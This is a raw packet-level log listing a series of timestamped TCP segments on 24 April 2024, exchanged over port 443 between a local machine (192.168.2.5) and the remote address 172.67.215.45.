                                                                                                                              Apr 24, 2024 06:48:18.817733049 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.817740917 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.817873001 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.818339109 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.818474054 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.819098949 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.819252968 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.820043087 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.820116997 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.820894957 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.820966005 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.821576118 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.821755886 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.822886944 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.822971106 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.823069096 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.823195934 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.823405981 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.823498011 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.824515104 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.824610949 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.825433969 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.825732946 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.826051950 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.826155901 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.826442957 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.826508999 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.827229023 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.827330112 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.872543097 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.872716904 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.976361036 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.976521969 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.976628065 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.976737976 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.976747036 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.976785898 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.976819992 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.977435112 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.977550983 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.977566004 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.977622986 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.978601933 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.978663921 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.978709936 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.978804111 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.979687929 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.979792118 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.980484962 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.980559111 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.981703997 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.981817961 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.982193947 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.982270002 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.982498884 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.982578039 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.983225107 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.983340979 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.984222889 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.984321117 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.985064030 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.985176086 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.985893011 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.985966921 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.986035109 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.986085892 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.986953974 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.987164021 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.987782955 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.987894058 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.988578081 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.988709927 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.988775969 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.988915920 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.989905119 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.990128040 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.991821051 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.991830111 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.991864920 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.991949081 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.991949081 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.991964102 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.992003918 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.995160103 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.995179892 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.995307922 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.995326042 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.995393991 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.998064041 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.998109102 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.998195887 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.998195887 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:18.998207092 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:18.998362064 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.000586987 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.000607014 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.000777960 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.000790119 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.000849009 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.003338099 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.003380060 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.003562927 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.003562927 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.003580093 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.003792048 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.008093119 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.008121967 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.008189917 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.008199930 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.008232117 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.008232117 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.009663105 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.009680033 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.009735107 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.009752989 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.009955883 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.012029886 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.012047052 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.012119055 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.012125015 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.012285948 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.032372952 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.032397985 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.032527924 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.032563925 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.032761097 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.136447906 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.136456966 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.136642933 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.136660099 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.136781931 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.138252974 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.138279915 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.138319969 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.138330936 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.138375044 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.138375044 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.141805887 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.141833067 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.141949892 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.141951084 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.141961098 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.142065048 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.144805908 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.144829988 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.144916058 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.144922972 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.145001888 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.147291899 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.147317886 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.147373915 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.147381067 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.147422075 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.147422075 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.150051117 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.150083065 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.150130987 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.150146961 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.150166988 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.150191069 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.152791977 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.152817011 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.152924061 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.152932882 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.152966976 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.156024933 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.156049013 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.156127930 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.156136036 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.156491041 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.159096003 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.159121037 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.159266949 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.159275055 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.159339905 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.161772966 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.161796093 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.162152052 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.162170887 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.162220955 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.164407969 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.164433002 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.164501905 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.164510012 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.164599895 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.167099953 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.167124033 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.167298079 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.167298079 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.167304993 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.167392969 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.170429945 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.170463085 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.170501947 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.170511007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.170557022 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.170557022 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.173146009 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.173175097 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.173326015 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.173326015 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.173332930 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.173393965 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.175853968 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.175875902 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.175920010 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.175926924 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.175954103 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.175966024 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.179261923 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.179286003 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.179374933 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.179382086 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.179555893 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.181828022 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.181853056 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.181932926 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.181932926 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.181941032 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.182473898 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.184614897 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.184637070 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.184879065 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.184886932 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.185441971 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.187433004 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.187459946 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.187587976 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.187597036 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.187832117 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.190658092 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.190680981 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.190809011 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.190829039 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.190895081 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.193428993 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.193453074 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.193593979 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.193603039 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.193730116 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.195976973 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.196002007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.196086884 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.196093082 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.196142912 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.199428082 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.199455023 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.199673891 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.199687958 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.200077057 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.202838898 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.202863932 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.203376055 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.203392982 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.203439951 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.204910994 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.204940081 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.205050945 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.205050945 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.205060005 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.205981970 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.207587957 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.207616091 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.208121061 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.208129883 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.208483934 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.210851908 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.210870981 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.212135077 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.212143898 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.212224007 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.213640928 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.213665962 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.213831902 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.213831902 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.213838100 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.214025974 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.296418905 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.296462059 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.296598911 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.296617031 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.296627045 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.296730995 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.298702002 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.298731089 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.298815012 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.298815966 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.298825026 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.298877001 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.301637888 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.301664114 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.301723957 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.301731110 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.301767111 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.301767111 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.304583073 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.304610014 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.304655075 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.304661989 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.304778099 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.304778099 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.307147026 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.307199001 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.307235956 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.307243109 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.307279110 CEST49706443192.168.2.5172.67.215.45
